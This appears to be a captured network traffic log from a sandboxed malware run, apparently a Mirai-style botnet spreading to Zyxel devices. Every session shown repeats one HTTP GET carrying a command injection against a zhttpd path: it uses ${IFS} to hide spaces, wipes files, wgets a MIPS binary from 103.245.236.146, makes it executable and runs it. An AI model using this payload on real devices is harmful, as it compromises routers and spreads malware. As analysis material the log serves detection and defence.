                                                        Jan 28, 2024 10:12:16.975127935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        260192.168.2.143883647.8.234.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978216887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        261192.168.2.145157048.188.7.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978282928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        262192.168.2.1439458202.201.249.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978291035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        263192.168.2.14523268.130.89.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978317022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        264192.168.2.1447204104.174.234.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978348970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        265192.168.2.1451250119.8.68.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978387117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        266192.168.2.1449538117.157.185.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978419065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        267192.168.2.1440940102.126.35.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978465080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        268192.168.2.143829637.118.217.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978482962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        269192.168.2.1434418144.250.70.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978503942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        270192.168.2.1447650204.153.125.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978528976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        271192.168.2.143806087.69.89.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978594065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        272192.168.2.144806086.248.74.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978599072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        273192.168.2.1454988169.97.82.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978632927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        274192.168.2.144102686.216.135.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978694916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        275192.168.2.1453768218.200.149.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978723049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        276192.168.2.145030850.183.157.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978729963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        277192.168.2.1447408180.101.169.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978785992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        278192.168.2.145067841.250.252.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978837967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        279192.168.2.144679424.177.77.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.978846073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        280192.168.2.145413214.27.96.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:17.979113102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        281192.168.2.144162297.118.61.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:18.982624054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        282192.168.2.145215877.69.215.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:18.982659101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        283192.168.2.1460220131.144.152.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:18.982726097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        284192.168.2.1439908144.99.231.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:18.982770920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        285192.168.2.1436088179.188.165.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:18.982774973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        286192.168.2.1455192188.5.232.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:18.982811928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        287192.168.2.1444690161.65.220.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:18.982911110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        288192.168.2.1451732220.53.123.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:18.982959986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        289192.168.2.145785068.246.163.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:19.986916065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        290192.168.2.1456500163.215.82.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:19.986959934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        291192.168.2.145916418.86.0.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:19.986974955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        292192.168.2.144693061.173.22.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:19.987032890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        293192.168.2.1452534207.175.179.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:19.987059116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        294192.168.2.143968078.29.96.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:19.987157106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        295192.168.2.1433628144.161.55.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:19.987205029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        296192.168.2.145565093.146.178.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:20.991755962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        297192.168.2.1451130175.26.203.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:20.991831064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        298192.168.2.1460240117.200.53.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:20.991842031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        299192.168.2.1452670207.6.166.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:20.991897106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        300192.168.2.1455126124.23.33.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:20.991928101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        301192.168.2.1443350113.149.48.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:20.991950989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        302192.168.2.143371039.120.77.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:20.992085934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        303192.168.2.1433406220.197.84.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:20.992127895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        304192.168.2.1455440166.189.125.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:20.992160082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        305192.168.2.146029671.179.76.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:21.996535063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        306192.168.2.146090088.121.45.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:21.996565104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        307192.168.2.1459298155.113.62.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:21.996606112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        308192.168.2.1447862121.100.186.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:21.996685028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        309192.168.2.1447090120.103.113.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:23.003107071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        310192.168.2.14523009.120.41.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:24.009206057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        311192.168.2.143501695.156.54.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:24.009255886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        312192.168.2.1444726175.162.193.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:24.009311914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        313192.168.2.1441066204.65.110.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:24.009396076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        314192.168.2.1446836171.192.158.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:25.015527010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        315192.168.2.143401250.164.209.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:25.015594006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        316192.168.2.1434754205.40.189.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:25.015655994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        317192.168.2.1447120207.71.134.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:25.015724897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        318192.168.2.1437040212.203.237.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:26.021872044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        319192.168.2.144448488.1.220.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:26.021929026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        320192.168.2.1438330133.190.64.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:26.021972895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
